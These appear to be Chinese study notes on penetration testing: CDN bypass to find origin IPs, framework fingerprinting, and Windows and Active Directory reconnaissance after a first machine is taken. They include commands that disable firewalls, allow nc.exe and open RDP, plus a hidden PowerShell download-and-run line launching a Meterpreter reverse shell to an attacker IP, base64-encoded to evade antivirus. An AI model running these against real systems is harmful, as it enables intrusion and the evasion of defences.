历史DNS解析记录，获取真实ip //网站起初没使用cdn时，真实ip解析过域名且没更换

---

CDN绕过找真实IP

1、ping子域名

2、国外ip ping域名 //使用网络拨测工具 https://boce.aliyun.com/detect/

3、超级ping //http://17ce.com https://ping.chinaz.com

4、利用网站功能请求攻击机的ip //如文件上传，能输入图片地址。服务器主动访问使用的是真实ip

5、邮件

操作步骤：服务器主动暴露真实IP，如发送重置密码邮件。查看邮件原文能看到发件人的ip

但是有两个问题：邮件是第三方代发；邮件服务器和服务器关系不大；

指纹识别

ICO图标：

1、某个应用系统的标示

2、某个公司/机构/个人团队的标示

#Python-开发框架-Django&Flask

Django

1、识别插件

2、固定的数据包格式：Set-Cookie:expires=

Flask

1、识别插件

2、固定的数据包格式：Etag: “flask X-Powered-By: Flask

Tornado

1、识别插件

2、固定的数据包格式：Server: TornadoServer

#JavaScript-开发框架-Vue&Node.js

Vue

1、识别插件

2、JS语法和加载文件

Node.js

1、识别插件

2、固定的数据包格式：ETag: W/”

#PHP-开发框架-ThinkPHP&Laravel&Yii

ThinkPHP：

0、识别插件

1、X-Powered-By: ThinkPHP

2、CMS识别到源码体系TP开发

Laravel：

1、识别插件

2、Set-Cookie中特征的格式 XSRF-TOKEN= laravel_session=

Yii:

1、识别插件

2、Set-Cookie中特征的格式 YII_CSRF_TOKEN=

#Java-框架组件-Fastjson&Shiro&Solr&Spring

52类110个主流Java组件和框架介绍：

https://blog.csdn.net/agonie201218/article/details/125300729

框架：

Struts2

一般使用struts2框架后缀带do或action，可以尝试进行利用

SpringBoot

1、默认web应用标签小绿叶图标

2、通过springboot框架默认页面

3、ICO源码体系采用SpringBoot开发

组件：

FastJson/Jackson

在提交JSON数据包中修改测试：

-FastJson组件会把01解析成1

-Jackson组件在解析01时会抛出异常

https://forum.butian.net/share/1679

Shiro

请求包的cookie中存在rememberMe字段。

返回包中存在set-Cookie：remeberMe=deleteMe。

请求包中存在rememberMe=x时，响应包中存在rememberMe=deleteMe。

有时候服务器不会主动返回remeberMe=deleteMe，直接发包即可，将Cookie内容改为remember Me=1，若相应包有rememberMe=deleteMe，则基本可以确定网站apache shiro搭建的。

Solr识别

一般开放8983端口,访问页面也可以探针到

#工具使用：

https://github.com/projectdiscovery/nuclei

内网信息收集

既然是研究内网了，相当于是说我们已经拿到一台机器，判断它所处的位置（逻辑），分析它的身份（上是否是内网里的机器，是什么样的机器）。。。。。

主要思考三个方面：
1.当前机器的角色
web服务器；开发测试服务器；公共服务器；文件服务器；代理服务器；DNS服务器；存储服务器等
2.当前机器所处网络环境的拓扑结构

3.当前机器所处的区域

收集本机信息

一、手动搜集

搜集本机：os；权限；内网IP地址段；杀毒软件；端口；服务；补丁更新频率；网络连接；共享；会话等

假设拿到一台主机是Windows操作系统

1.查询网络配置：
ipconfig /all

2.查询操作系统及软件的信息
查询os和版本信息
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
如果是中文版os
systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本”

查系统体系结构
echo %PROCESSOR_ARCHITECTURE%

查询安装的软件以及版本
wmic product get name,version
如果使用powershell来查
powershell “Get-WmicObject -class Win32_Product |Select-Object -Property name,version”

3.查询本机服务
wmic service list brief

4.查询进程列表
查看进程用户，分析软件，邮件客户端，VPN，杀软等
tasklist
查看进程信息
wmic process list brief

5.查看启动程序信息
wmic startup get command,caption

6.查看计划任务
schtask /query /fo LIST /v

7.查看开机时间
net statistics workstation

8.查看用户列表
net user
通过分析用户列表，总结出内网机器的命名规则，于是可以推出其他机器的名称，进而知道整个域

获取本地管理员信息
net localgroup administrators

看当前在线用户
query user || qwinsta //测试不成功

9.列出或者断开本地计算机与所连接的客户端之间的会话
net seesion

10.查看端口
netstat -ano //端口信息可以参考之前关于信息收集文章中的端口

11.查看补丁
systeminfo

查看安装在系统的补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn

12.查询本机共享列表
net share

或者用
wmic share get name,path,status

13.查询路由表以及可用接口的ARP缓存表
arp -a

14.防火墙
关闭win2003之前的防火墙:netsh firewall set opmode disable
关闭win2003之后的防火墙:netsh advfirewall set allprofiles state off

查看防火墙配置
netsh firewall show config

修改防护墙配置
win2003之前:netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
win2003之后:
(1)允许指定程序进入
netsh advfirewall firewall add rule name=”pass nc” dir=in action=allow program=”C: \nc.exe”
(2)允许指定程序退出
netsh advfirewall firewall add rule name=”Allow nc” dir=out action=allow program=”C: \nc.exe”
(3)允许3389（远程登陆）放行
netsh advfirewall firewall add rule name=”Remote Destop” protocol=TCP dir=in localport=3389 action=allow
(4)自定义防火墙日志存储位置
netsh advfirewall set currentprofile logging filename “C: \window\temp\fw.log”

15.查看代理配置
reg query “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings”

16.查看并开启远程服务
查看远程连接端口
REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber

在windows server2003开启3389
wmic path win32_terminalservicesetting where (__CLASS !=””) call setallowtsconnections 1
在Windowsserver2008 windows server2012开3389
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=””) call setallowtsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=’RDP-Tcp’) call setuserauthenticationrequired 1

reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

可以看到，我们可以通过工具或者脚本让上述方法更加便捷，下面介绍一个利用WMIC收集目标机器信息的脚本：
WMIC(windows management instrumentation command-Line).一般XP的地权限用户不能访问WMIC，win7以上的低权限用户允许访问WMIC并执行查询

二、查询当前权限

1.查询当前权限
whoami
如果当前内网存在域，那么本地普通用户只能查看本机相关的信息不能看域内信息。
但是本地管理员用户和域内用户可以查询域内信息，因为域内所有查询通过域控制器DC，是经过权限认证的，域内用户拥有权限，使用Kerberos协议认证。本地管理员权限可以提升为Ntauthority或System权限（都比administrator权限高）。
我们知道，在域中除了普通用户之外，所有机器都有一个机器用户（用户名为 机器名+”$”）

2.查询域SID
whoami /all

3.查询指定用户的详细信息
net user xxx /domain

三、判断是否存在域

1.使用ipconfig命令搜集信息
ipconfig /all
然后通过nslook解析域名的ip地址，比对看看域控制器和DNS服务器在不在同一台设备

2.查看系统详细信息
systeminfo

3.查看当前登录域以及登录用户信息
net config workstation

4.判断主域
net time /domain //该命令用来判断，会产生一些结果，域服务器通常同时作为时间服务器使用
(1)存在域，但当前用户不是域用户
(2)存在域，当前用户是域用户
(3)不存在域，当前是工作组

四、探测域内存活主机

1.利用NetBIOS探测内网
2.利用ICMP协议探测内网
3.ARP扫描探测内网
4.通过常规TCP\UDP端口探测内网

五、扫描域内端口

关注三点：
端口上的banner信息
端口上运行的服务
常见的默认端口（见以往文章）

扫的话就是用工具扫

六、搜集域内信息
假设我们知道内网存在域并且控制的机器在域内

1.查询域：
net view /domain

2.查询域内所有计算机
net view .domain:XXX //xxx指的是域的名
我们可以根据主机名来判断主机角色：
dev:可能是开发服务器
web、app:可能是Web服务器
NAS:可能是存储服务器
fileserver:可能是文件服务器

3.查询域内所有用户列表
net group /domain
系统自带常见用户身份：
domain admins:域管理员
domain computers:域内机器
domain controllers:域控制器
domain guest:域访客，权限低
domain users:域用户
enterprise admins:企业系统管理员用户
【domain admins和enterprise admins对域控制器有完全控制权限】

4.查询所有域成员计算机列表
net group “domain computers” /domain

5.获取域密码（密码策略、长度、错误锁定等）
net accounts /domain

6.获取域新人
nltest /domain_trusts

七、查找与域控制器

1.查看域控制器的机器名
nltest /DCLIST:XXX //XXX是域的名称

2.查看域控制器的主机名
Nslookup -type=SRV _ldap._tcp

3.查看当前时间
net time /domain(通常时间服务器是主域控制器)

4.查看域控制器组
net group “Domain Controllers” /domain
下面命令看到域控制器名字
netdom query pdc

八、获取域内的用户和管理员信息

1.向域控制器进行查询
net user /domain

2.获取域内用户的详细信息
wmic useraccount get /all

3.查看存在的用户
dsquery user

4.查询本地管理员组用户
net localgroup administrators

—查询域管理员用户组
1.查询域管理员用户
net group “domain admins” /domain

2.查询管理员用户组
net group “Enterprise Admins” /domain

九、定位域管理员
书本提到内网测试跟渗透测试是截然不同，内网测试是针对内网中特定用户或机器的权限，获取特定的资源

当设备被添加到域中，域管理员会自动添加到本地管理员组，获得完全控制权限，有时候一台设备在自己的域中不是管理员，但是可能是其他域的管理员，所以我们要寻找具有管理员权限的用户。
定位域内管理员的方式：
1.日志
2.会话

常用域管理员定位工具：
psloggedon.exe;PVEFindADUser.exe;netsess.exe;hunter;NetView等

十、查找域管理进程

—本机检查

1.获取域管理员列表
net group “Domain Admins” /domain

2.列出本机所有进程以及进程用户
tasklist /v

3.寻找进程所有者为域管理员的进程

—查询域控制器的域用户会话

1.查询域控制器列表
net group “Domain Contorllers” /domain

2.收集域管理员列表
net group “Domain Admins” /domain

3.收集所有活动域的会话列表
使用Netsess.exe查询每个域控制器，使用下面命令：
NetSess -h

4.交叉引用域管理员列表与活动会话列表

—查询远程系统中运行的任务

—扫描远程系统的NetBIOS

十一、使用powershell收集域信息
在上一篇文章，也就是内网（一）提到过powershell用法

十二、使用域分析工具BloodHound

前面文章学习的渗透环节，或者打的DC-1靶场到了提权就结束，没有对后渗透再进行描述和联系。而在实际中对某个目标造成影响更大的我想是后渗透阶段，关注内网安全是每个单位的重中之重，为了拓宽知识面，我购买阅读《内网安全攻防-渗透测试指南》一书进行学习。

内网渗透测试基础

内网一般可以指局域网（local area network)，是封闭的。

在Dr.Lee的课程上，在以windows2012R2为例子学习服务器时，就介绍过内网相关的知识。提到了几个名词：工作组、域、域控制器、父域、域树、域森岭、活动目录、DMZ等。

当年presentation的时候我曾向其他同学介绍过活动目录，但今天已经忘记了相关内容。因此本次学习既是对以往知识的回顾，也是让自己对内网安全更熟悉。

下面是对这些名词的解释：

1.工作组work group
根据职能给不同的计算机划分组别，方便管理。我们电脑上的网上邻居不常使用，在里面能看到同一工作组的设备。工作组中的设备身份对等，可以自由访问。

2.域domain
域是一个有安全边界的计算机集合，一个域中计算机无法访问其他域。
域控制器domain controller是域中的管理服务的计算机，域中计算机要互相访问需要经过域控制器审核。在Dr.Lee课程的实验里，我们需要把服务器变成域服务器，才能增加role或者修改一些规则。域控制器是域的通信枢纽，域内所有用来验证身份的账号和密码散列值都保存在域控制器中。因此我认为这些信息类比shadow文件一样，如果能利用那么就能进行权限的获取。
域中的环境：
a.单域：
要求至少两台域服务器，一台存储活动目录，一台备份。
b.父域和子域：
类比父子节点的关系。每个域可以制定自己的安全策略。
c.域树tree：
域树，是不同域之间通过信任关系(trust relation)组合的集合。域管理员一般智能管理本域的资源，如果两个域需要访问，要建立信任关系。
注意在一个域树里父域包含多个子域，而子域是相对于父域说的，指的是域名中的每一个段，各个子域之间用“.”隔开代表层次。以下面的域名作为例子，放在域名最后的子域称为最高级子域或者一级域，它前面的子域是二级域：
asia.abc.com
abc.com
后者比前者高级。读域名应该从后往前看，”.com”是顶级域名，它的子域名是“.abc”,所以说“asia.abc.com”是“abc.com”的子域。
d.域森岭forst
多个域树通过建立信任关系组成的集合。如abc.com跟abc.net不是同一个域树，通过建立信任关系通信。
5.DNS域名服务器
面试常考，用处就是实现域名和IP地址的转换。一般域的名字就是DNS域的名字。在内网渗透测试中，大都是通过寻找DNS服务器来确定域控制器位置，而DNS服务器和域控制器通常配置在同一台机器上。

3.活动目录active directory AD
活动目录指的是域环境中提供目录服务的组件。
使用它的目的是方便企业在网络环境中集中式管理。目录存储着有关网络对象的信息。跟我想的一样，活动目录其实就相当于索引，方便我们快速查找资料。
活动目录的逻辑结构，在Dr.Lee课程上也讲过分为组织单元OU、域、域树、域森岭。

【域控制器和活动目录的区别】：当网络规模大，里面的资源信息存储在某种数据库，就是活动目录数据库[AD库]，当内网中有一台机子安装AD那么它就变成DC。

4.安全域
根据安全等级对计算机进行划分到不同网段。通过防火墙来进行访问控制。

如上图分为外网、DMZ、内网。DMZ是一个非安全与安全之间的缓冲区。
DMZ中一般有必须对外的服务器，如WEB、FTP、IPS、IDS等。DMZ只能从外部访问。

如上述三层结构，需要通过配置安全策略实现屏障的功能。
内网可以访问外网； //防火墙需要执行NAT
内网可以访问DMZ；
外网不能访问内网； //除非是用VPN
外网可以访问DMZ；
DMZ不能访问内网；
DMZ不能访问外网；

而对于内网，又分为办公区和核心区：
办公区：是攻击者进入内网的重要途径
核心区：能访问该区域的只有管理员和运维人员

5.域中计算机分类：
域控制器
成员服务器
客户机
独立服务器

6.域内权限
域本地组、全局组、通用组
不管是学习还是实践操作经常看到本地组策略这个名词，忘了是那个版本的os家庭版没有该功能，貌似是win10，要通过一些方法修改之后能唤出该策略。
书中给了一句口诀：“域本地组来自全林，作用于本域；全局组来自本域，作用域全林；通用组来自全林，作用于全林。”
A-G-DL-P策略：将用户账号添加到全局组，把全局组添加到域本地组中，之后为域本地组分配资源权限，方便管理。
A.用户账号 account
G.全局组 global group
U.通用组 universal group
DL.域本地组 domain local group
P.资源权限 permission

书中介绍了几个重要的域本地组权限：
管理员组administrator：
远程登录组remote desktop users：
打印机操作员组print operators：
账号操作员组account operators：
服务操作员组server operators：
备份操作员组backup operators：

---

重要的全局组、通用组权限：
域管理员组domain admins：
企业系统管理员组enterpri admins：
架构管理员组schema admins：
域用户组：domain users：

WINDOWS POWERSHELL

1.ps1文件：
powershell脚本是一个简单的文本文件，扩展名为“.ps1”

2.执行策略：
默认情况下，为了保护不受恶意操作者影响，执行策略被设置为不能运行。
当我们的powershell脚本不能运行，首先使用cmdlet命令查询当前执行策略
下面是能选择的策略：
Get-Execution Policy
Restricted
RemoteSigned
AllSigned
Unrestricted
通过使用 Set-ExcutionPolicy <policy name> 来设置powershell执行策略

3.运行脚本
注意，运行powershell脚本需要完整输入路径和文件名。如“C:\Scripts\a.ps1”

4.管道
以前一个输入的结果作为 | 后的输入
例：让所有以P开头的程序停止运行“PS>get-process p* | stop-process”

---

POWER SHELL常用命令（不区分大小写）

1.基本知识
新建目录：New-ltem whitecellcliub-ltemType Directory
新建文件：New-ltem light.txt-ltemType File
删除目录：Remove-ltem whitecellclub
显示文本内容：Get-Content test.txt
设置文本内容：Set-Content test.txt-Value “hello,world!”
追加内容：Add-Content light.txt-Value “bobo”
清除内容：Clear-Content test.txt

2.命令
首先，要执行powershell命令，在cmd输入“powershell”进入环境。若要运行powershell脚本程序，用管理员权限将策略从Restricted变成Unrestricted

(1)绕过本地权限并执行
首先先把PowerUp.ps1上传到目标服务器，然后在目标服务器执行：
PowerShell.exe -ExecutionPolicy Bypass -File PowerUp.ps1

将同一个脚本上传到目标服务器，在目标本地执行脚本文件：
powershell.exe -exec bypass -Command “& {Import-Module c:\PowerUp.ps1;Invoke-AllChecks}”

(2)从网站服务器下载脚本，绕过本地权限并隐藏执行
PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString(“xxx.ps1”);[parameters]

最终执行：
PowerShell.exe -ExecutionPolocy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNe.WebClient).DownloadString(“<xxxxxxxx>”);Invoke-Shellcode -Payload windows/meterpreter/reverse_hyyps-Lhost 192.168.11.11 -Lport 80

解释一下参数：
execution policy bypass(Exec Bypass):绕过安全策略
windowstyle hidden:隐藏窗口
noninteractive(NonI):非交互模式，powershell不提供与用户的交互
noprofile：(-NoP):powershell不加载当前用户的配置文件
noexit：执行后不退出shell //在使用键盘记录等脚本的时候非常重要
NoLogo:启动时不显示版权标志的powershell

(3)使用base64编码powershell进行免杀
由于脚本里有特殊字符，不进行编码混淆压缩的话可能会被杀软杀掉。用python脚本加密，注意转换的对象必须是文本文件，所以要先把命令保存成文本文件：
echo “IEX(New-Object Net.WebClient).DownloadString(‘<xxxxxx>’) ;Invoke-Shellcode-Payload windows/metererter/reverse_https-Lhost 192.168.11.11 -Lport 80 -Force” >raw.txt

给加密的脚本文件权限：
chmod +x ps_encoder.py

使用加密脚本封装：
./ps_encoder.py -s raw.txt

之后就会得到编码之后的命令文本，记为X然后在远程主机执行：
Powershell.exe -NoP -NonI -W Hidden -Exc Bypass -enc X

---

关于32位和64位的powershell：
32：Powershell.exe -NoP -NonI -W Hidden -Exec Bypass
64:%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exc Bypass // 64的配置文件在路径%WinDir%\syswow64\windowspowershell\v1.0\